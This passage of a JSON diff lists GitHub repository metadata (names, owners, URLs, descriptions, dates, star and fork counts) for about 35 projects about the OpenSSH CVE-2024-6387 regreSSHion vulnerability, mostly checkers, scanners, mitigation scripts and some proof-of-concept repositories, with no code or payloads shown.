}, + { + "id": 823323116, + "name": "cve-2024-6387-nuclei-template", + "full_name": "BrandonLynch2402\/cve-2024-6387-nuclei-template", + "owner": { + "login": "BrandonLynch2402", + "id": 19439875, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19439875?v=4", + "html_url": "https:\/\/github.com\/BrandonLynch2402", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BrandonLynch2402\/cve-2024-6387-nuclei-template", + "description": null, + "fork": false, + "created_at": "2024-07-02T20:19:12Z", + "updated_at": "2024-07-31T06:59:36Z", + "pushed_at": "2024-07-02T20:28:35Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823328220, + "name": "CVE-2024-6387_Check", + "full_name": "edsonjt81\/CVE-2024-6387_Check", + "owner": { + "login": "edsonjt81", + "id": 27496739, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27496739?v=4", + "html_url": "https:\/\/github.com\/edsonjt81", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/edsonjt81\/CVE-2024-6387_Check", + "description": null, + "fork": false, + "created_at": "2024-07-02T20:35:53Z", + "updated_at": "2024-07-02T20:38:08Z", + "pushed_at": "2024-07-02T20:38:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823340268, + "name": "CVE-2024-6387", + "full_name": "grupooruss\/CVE-2024-6387", + "owner": { + "login": "grupooruss", + "id": 43943489, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43943489?v=4", + "html_url": "https:\/\/github.com\/grupooruss", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/grupooruss\/CVE-2024-6387", + "description": "regreSSHion vulnerability in OpenSSH CVE-2024-6387 Testing Script", + "fork": false, + "created_at": "2024-07-02T21:16:45Z", + "updated_at": "2024-07-08T23:58:50Z", + "pushed_at": "2024-07-02T21:30:12Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 823349523, + "name": "CVE-2024-6387-Checker", + "full_name": "CognisysGroup\/CVE-2024-6387-Checker", + "owner": { + "login": "CognisysGroup", + "id": 101755095, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101755095?v=4", + "html_url": "https:\/\/github.com\/CognisysGroup", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CognisysGroup\/CVE-2024-6387-Checker", + "description": null, + "fork": false, + "created_at": "2024-07-02T21:47:02Z", + "updated_at": "2024-07-03T12:15:46Z", + "pushed_at": "2024-07-03T12:13:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823487291, + "name": "CVE-2024-6387", + "full_name": "sxlmnwb\/CVE-2024-6387", + "owner": { + "login": "sxlmnwb", + "id": 65052912, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65052912?v=4", + "html_url": "https:\/\/github.com\/sxlmnwb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sxlmnwb\/CVE-2024-6387", + "description": "Targeting a signal handler race condition in OpenSSH's server (sshd) on glibc-based Linux systems.", + "fork": false, + "created_at": "2024-07-03T06:08:32Z", + "updated_at": "2024-12-05T20:11:29Z", + "pushed_at": "2024-07-03T06:47:46Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-6387" + ], + "visibility": "public", + "forks": 5, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823542110, + "name": "CVE-2024-6387", + "full_name": "Symbolexe\/CVE-2024-6387", + "owner": { + "login": "Symbolexe", + "id": 140549630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/140549630?v=4", + "html_url": "https:\/\/github.com\/Symbolexe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Symbolexe\/CVE-2024-6387", + "description": "SSH Exploit for CVE-2024-6387 : RCE in OpenSSH's server, on glibc-based Linux systems", + "fork": false, + "created_at": "2024-07-03T08:22:57Z", + "updated_at": "2024-08-20T21:05:45Z", + "pushed_at": "2024-07-04T15:07:21Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-6387", + "exploit", + "pentesting", + "python3", + "redteam" + ], + "visibility": "public", + "forks": 5, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823593765, + "name": "sentinelssh", + "full_name": "harshinsecurity\/sentinelssh", + "owner": { + "login": "harshinsecurity", + "id": 51978908, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51978908?v=4", + "html_url": "https:\/\/github.com\/harshinsecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/harshinsecurity\/sentinelssh", + "description": "SentinelSSH is an advanced, high-performance SSH vulnerability scanner written in Go. It's specifically designed to detect the CVE-2024-6387 vulnerability in OpenSSH servers across various network environments.", + "fork": false, + "created_at": "2024-07-03T10:26:23Z", + "updated_at": "2024-09-07T05:01:32Z", + "pushed_at": "2024-07-08T07:32:32Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-6387", + "exploit", + "openssh", + "ssh" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823665546, + "name": "cve-2024-6387-poc", + "full_name": "t3rry327\/cve-2024-6387-poc", + "owner": { + "login": "t3rry327", + "id": 65151897, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65151897?v=4", + "html_url": "https:\/\/github.com\/t3rry327", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/t3rry327\/cve-2024-6387-poc", + "description": null, + "fork": false, + "created_at": "2024-07-03T13:21:10Z", + "updated_at": "2024-07-03T13:25:02Z", + "pushed_at": "2024-07-03T13:24:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823735743, + "name": "CVE-2024-6387_poc", + "full_name": "jocker2410\/CVE-2024-6387_poc", + "owner": { + "login": "jocker2410", + "id": 22291909, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22291909?v=4", + "html_url": "https:\/\/github.com\/jocker2410", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jocker2410\/CVE-2024-6387_poc", + "description": null, + "fork": false, + "created_at": "2024-07-03T15:51:16Z", + "updated_at": "2024-08-04T10:50:56Z", + "pushed_at": "2024-08-04T10:50:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823899223, + "name": "sshd-logingracetime0", + "full_name": "liqhtnd\/sshd-logingracetime0", + "owner": { + "login": "liqhtnd", + "id": 88907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88907425?v=4", + "html_url": "https:\/\/github.com\/liqhtnd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/liqhtnd\/sshd-logingracetime0", + "description": "Script to address CVE-2024-6387 by changing the LoginGraceTime in sshd.", + "fork": false, + "created_at": "2024-07-04T01:02:34Z", + "updated_at": "2024-07-13T18:45:36Z", + "pushed_at": "2024-07-13T18:43:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823939765, + "name": "ssh-CVE-2024-6387-poc", + "full_name": "JackSparrowhk\/ssh-CVE-2024-6387-poc", + "owner": { + "login": "JackSparrowhk", + "id": 108756180, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108756180?v=4", + "html_url": "https:\/\/github.com\/JackSparrowhk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JackSparrowhk\/ssh-CVE-2024-6387-poc", + "description": "CVE-2024-6387_Check 是一款轻量级、高效的工具,旨在识别运行易受攻击的 OpenSSH 版本的服务器,专门针对最近发现的regreSSHion漏洞 (CVE-2024-6387)。此脚本有助于快速扫描多个 IP 地址、域名和 CIDR 网络范围,以检测潜在漏洞并确保您的基础设施安全。", + "fork": false, + "created_at": "2024-07-04T03:51:16Z", + "updated_at": "2024-07-04T03:51:16Z", + "pushed_at": "2024-07-04T03:51:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823940931, + "name": "CVE-2024-6387-OpenSSH-Vulnerability-Checker", + "full_name": "turbobit\/CVE-2024-6387-OpenSSH-Vulnerability-Checker", + "owner": { + "login": "turbobit", + "id": 11604783, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11604783?v=4", + "html_url": "https:\/\/github.com\/turbobit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/turbobit\/CVE-2024-6387-OpenSSH-Vulnerability-Checker", + "description": "Welcome to the CVE-2024-6387 OpenSSH Vulnerability Checker repository! This project offers multiple scripts to check the installed version of OpenSSH on your system and determine if it is vulnerable to CVE-2024-6387. It supports various environments, including Ubuntu, Mac, and Windows.", + "fork": false, + "created_at": "2024-07-04T03:56:08Z", + "updated_at": "2024-07-07T21:11:55Z", + "pushed_at": "2024-07-04T05:13:49Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-6387-checker" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823979710, + "name": "CVE-2024-6387", + "full_name": "sms2056\/CVE-2024-6387", + "owner": { + "login": "sms2056", + "id": 15358350, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15358350?v=4", + "html_url": "https:\/\/github.com\/sms2056", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sms2056\/CVE-2024-6387", + "description": null, + "fork": false, + "created_at": "2024-07-04T06:10:56Z", + "updated_at": "2024-07-04T06:16:22Z", + "pushed_at": "2024-07-04T06:16:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 824151224, + "name": "regreSSHion-CVE-2024-6387-", + "full_name": "invaderslabs\/regreSSHion-CVE-2024-6387-", + "owner": { + "login": "invaderslabs", + "id": 149894888, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149894888?v=4", + "html_url": "https:\/\/github.com\/invaderslabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/invaderslabs\/regreSSHion-CVE-2024-6387-", + "description": "Provides instructions for using the script to check if your OpenSSH installation is vulnerable to CVE-2024-6387", + "fork": false, + "created_at": "2024-07-04T13:15:54Z", + "updated_at": "2024-07-04T22:22:18Z", + "pushed_at": "2024-07-04T22:22:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 824156825, + "name": "CVE-2024-6387", + "full_name": "lala-amber\/CVE-2024-6387", + "owner": { + "login": "lala-amber", + "id": 72958716, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72958716?v=4", + "html_url": "https:\/\/github.com\/lala-amber", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lala-amber\/CVE-2024-6387", + "description": null, + "fork": false, + "created_at": "2024-07-04T13:28:53Z", + "updated_at": "2024-10-07T12:21:51Z", + "pushed_at": "2024-07-04T13:35:57Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 824185491, + "name": "regreSSHive", + "full_name": "4lxprime\/regreSSHive", + "owner": { + "login": "4lxprime", + "id": 58915711, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58915711?v=4", + "html_url": "https:\/\/github.com\/4lxprime", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/4lxprime\/regreSSHive", + "description": "rewrited SSH Exploit for CVE-2024-6387 (regreSSHion)", + "fork": false, + "created_at": "2024-07-04T14:34:21Z", + "updated_at": "2024-07-04T15:27:03Z", + "pushed_at": "2024-07-04T14:34:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "6387", + "c", + "cve", + "cve-2024-6387", + "exploit", + "poc", + "regresshion", + "ssh", + "sshd" + ], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 824318880, + "name": "CVE-2024-6387_Check", + "full_name": "sardine-web\/CVE-2024-6387_Check", + "owner": { + "login": "sardine-web", + "id": 80635620, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80635620?v=4", + "html_url": "https:\/\/github.com\/sardine-web", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sardine-web\/CVE-2024-6387_Check", + "description": "A security regression (CVE-2006-5051) was discovered in OpenSSH's server (sshd). There is a race condition which can lead to sshd to handle some signals in an unsafe manner. An unauthenticated, remote attacker may be able to trigger it by failing to authenticate within a set time period.", + "fork": false, + "created_at": "2024-07-04T21:20:26Z", + "updated_at": "2024-07-05T10:10:03Z", + "pushed_at": "2024-07-04T21:31:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 824382817, + "name": "cve-2024-6387_hassh", + "full_name": "0x4D31\/cve-2024-6387_hassh", + "owner": { + "login": "0x4D31", + "id": 11577776, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11577776?v=4", + "html_url": "https:\/\/github.com\/0x4D31", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x4D31\/cve-2024-6387_hassh", + "description": "HASSH fingerprints for identifying OpenSSH servers potentially vulnerable to CVE-2024-6387 (regreSSHion).", + "fork": false, + "created_at": "2024-07-05T02:46:57Z", + "updated_at": "2024-09-27T09:29:35Z", + "pushed_at": "2024-07-05T03:40:53Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-6387", + "fingerprint", + "hassh", + "regresshion", + "ssh" + ], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 824544385, + "name": "CVE-2024-6387-template", + "full_name": "sardine-web\/CVE-2024-6387-template", + "owner": { + "login": "sardine-web", + "id": 80635620, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80635620?v=4", + "html_url": "https:\/\/github.com\/sardine-web", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sardine-web\/CVE-2024-6387-template", + "description": "Quick regreSSHion checker (based on software version) for nuclei CVE-2024-6387", + "fork": false, + "created_at": "2024-07-05T11:05:26Z", + "updated_at": "2024-07-06T17:26:24Z", + "pushed_at": "2024-07-06T17:26:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 824549009, + "name": "CVE-2024-6387", + "full_name": "imv7\/CVE-2024-6387", + "owner": { + "login": "imv7", + "id": 13357603, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13357603?v=4", + "html_url": "https:\/\/github.com\/imv7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/imv7\/CVE-2024-6387", + "description": null, + "fork": false, + "created_at": "2024-07-05T11:18:38Z", + "updated_at": "2024-07-05T11:19:24Z", + "pushed_at": "2024-07-05T11:19:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 824639761, + "name": "CVE-2024-6387-Finder", + "full_name": "SiberianHacker\/CVE-2024-6387-Finder", + "owner": { + "login": "SiberianHacker", + "id": 115571334, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115571334?v=4", + "html_url": "https:\/\/github.com\/SiberianHacker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SiberianHacker\/CVE-2024-6387-Finder", + "description": "CVE-2024-6387 SSH finder", + "fork": false, + "created_at": "2024-07-05T15:15:41Z", + "updated_at": "2024-07-05T15:22:29Z", + "pushed_at": "2024-07-05T15:22:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 824752906, + "name": "CVE-2024-6387-how-to-fix", + "full_name": "azurejoga\/CVE-2024-6387-how-to-fix", + "owner": { + "login": "azurejoga", + "id": 91762249, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91762249?v=4", + "html_url": "https:\/\/github.com\/azurejoga", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/azurejoga\/CVE-2024-6387-how-to-fix", + "description": "Vulnerability remediation and mitigationCVE-2024-6387", + "fork": false, + "created_at": "2024-07-05T21:29:11Z", + "updated_at": "2024-08-12T14:40:39Z", + "pushed_at": "2024-07-05T21:47:44Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 825724862, + "name": "CVE-2024-6387", + "full_name": "asterictnl-lvdw\/CVE-2024-6387", + "owner": { + "login": "asterictnl-lvdw", + "id": 99249102, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99249102?v=4", + "html_url": "https:\/\/github.com\/asterictnl-lvdw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/asterictnl-lvdw\/CVE-2024-6387", + "description": "Remote Unauthenticated Code Execution Vulnerability in OpenSSH server (CVE-2024-6387)", + "fork": false, + "created_at": "2024-07-08T11:27:49Z", + "updated_at": "2025-01-07T21:40:36Z", + "pushed_at": "2024-08-22T08:50:25Z", + "stargazers_count": 69, + "watchers_count": 69, + "has_discussions": false, + "forks_count": 30, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 30, + "watchers": 69, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 825734560, + "name": "regreSSHion", + "full_name": "vkaushik-chef\/regreSSHion", + "owner": { + "login": "vkaushik-chef", + "id": 91254377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91254377?v=4", + "html_url": "https:\/\/github.com\/vkaushik-chef", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vkaushik-chef\/regreSSHion", + "description": "Chef Inspec profile for checking regreSSHion vulnerability CVE-2024-6387", + "fork": false, + "created_at": "2024-07-08T11:48:15Z", + "updated_at": "2024-07-08T12:04:36Z", + "pushed_at": "2024-07-08T12:04:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 826287983, + "name": "mitigate-CVE-2024-6387", + "full_name": "dgourillon\/mitigate-CVE-2024-6387", + "owner": { + "login": "dgourillon", + "id": 50948886, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50948886?v=4", + "html_url": "https:\/\/github.com\/dgourillon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dgourillon\/mitigate-CVE-2024-6387", + "description": null, + "fork": false, + "created_at": "2024-07-09T12:16:44Z", + "updated_at": "2024-07-09T16:03:07Z", + "pushed_at": "2024-07-09T16:03:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 826336009, + "name": "CVE-2024-6387", + "full_name": "mrmtwoj\/CVE-2024-6387", + "owner": { + "login": "mrmtwoj", + "id": 22832463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22832463?v=4", + "html_url": "https:\/\/github.com\/mrmtwoj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mrmtwoj\/CVE-2024-6387", + "description": "regreSSHion is a security tool designed to test for vulnerabilities related to CVE-2024-6387, specifically focusing on SSH and remote access exploitation. ", + "fork": false, + "created_at": "2024-07-09T14:06:02Z", + "updated_at": "2024-10-07T04:02:49Z", + "pushed_at": "2024-07-09T14:29:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-6387", + "cve-2024-6387-checker", + "openssh", + "openssh-key", + "poc", + "regresshion-cve-2024-6387-ssh-security" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 826432240, + "name": "CVE-2024-6387-Vulnerability-Checker", + "full_name": "filipi86\/CVE-2024-6387-Vulnerability-Checker", + "owner": { + "login": "filipi86", + "id": 31785433, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31785433?v=4", + "html_url": "https:\/\/github.com\/filipi86", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/filipi86\/CVE-2024-6387-Vulnerability-Checker", + "description": "This Python script checks for the CVE-2024-6387 vulnerability in OpenSSH servers. It supports multiple IP addresses, URLs, CIDR ranges, and ports. The script can also read addresses from a file.", + "fork": false, + "created_at": "2024-07-09T17:40:19Z", + "updated_at": "2024-10-23T02:21:38Z", + "pushed_at": "2024-07-10T15:24:08Z", + "stargazers_count": 92, + "watchers_count": 92, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 17, + "watchers": 92, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 826508816, + "name": "CVE-2024-6387-Vulnerability-Checker", + "full_name": "kubota\/CVE-2024-6387-Vulnerability-Checker", + "owner": { + "login": "kubota", + "id": 119277, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119277?v=4", + "html_url": "https:\/\/github.com\/kubota", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kubota\/CVE-2024-6387-Vulnerability-Checker", + "description": "This Rust Code is designed to check SSH servers for the CVE-2024-6387 vulnerability", + "fork": false, + "created_at": "2024-07-09T21:01:15Z", + "updated_at": "2024-07-11T05:46:45Z", + "pushed_at": "2024-07-09T21:08:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 826836993, + "name": "cve-2024-6387-poc", + "full_name": "DimaMend\/cve-2024-6387-poc", + "owner": { + "login": "DimaMend", + "id": 145161091, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145161091?v=4", + "html_url": "https:\/\/github.com\/DimaMend", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DimaMend\/cve-2024-6387-poc", + "description": null, + "fork": false, + "created_at": "2024-07-10T13:27:23Z", + "updated_at": "2024-07-10T13:33:54Z", + "pushed_at": "2024-07-10T13:33:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 827444140, + "name": "mitigate_ssh", + "full_name": "Sibijo\/mitigate_ssh", + "owner": { + "login": "Sibijo", + "id": 148327357, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148327357?v=4", + "html_url": "https:\/\/github.com\/Sibijo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sibijo\/mitigate_ssh", + "description": " OpenSSH vulnerability CVE-2024-6387", + "fork": false, + "created_at": "2024-07-11T16:54:41Z", + "updated_at": "2024-07-29T17:48:05Z", + "pushed_at": "2024-07-11T16:55:52Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 827570389, + "name": "regreSSHion-Fix", + "full_name": "Passyed\/regreSSHion-Fix", + "owner": { + "login": "Passyed", + "id": 102136066, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102136066?v=4", + "html_url": "https:\/\/github.com\/Passyed", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Passyed\/regreSSHion-Fix", + "description": "Fix for regreSSHion CVE-2024-6387 for Ubuntu and Debian", + "fork": false, + "created_at": "2024-07-11T23:22:14Z", + "updated_at": "2024-07-12T00:07:02Z", + "pushed_at": "2024-07-12T00:06:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 828627988, + "name": "CVE-2024-6387", + "full_name": "dream434\/CVE-2024-6387", + "owner": { + "login": "dream434", + "id": 114837630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114837630?v=4", + "html_url": "https:\/\/github.com\/dream434", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dream434\/CVE-2024-6387", + "description": " OpenSSH a publié un avis de sécurité concernant la vulnérabilité critique CVE-2024-6387. Cette vulnérabilité permet à un attaquant non authentifié d'exécuter du code arbitraire", + "fork": false, + "created_at": "2024-07-14T18:00:49Z", + "updated_at": "2024-07-14T18:05:22Z", + "pushed_at": "2024-07-14T18:02:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 829031934, + "name": "CVE-2024-6387", + "full_name": "ThatNotEasy\/CVE-2024-6387", + "owner": { + "login": "ThatNotEasy", + "id": 25004320, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25004320?v=4", + "html_url": "https:\/\/github.com\/ThatNotEasy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ThatNotEasy\/CVE-2024-6387", + "description": "OpenSSH RCE Massive Vulnerable Scanner", + "fork": false, + "created_at": "2024-07-15T16:04:57Z", + "updated_at": "2024-10-30T04:42:06Z", + "pushed_at": "2024-07-15T16:06:41Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": 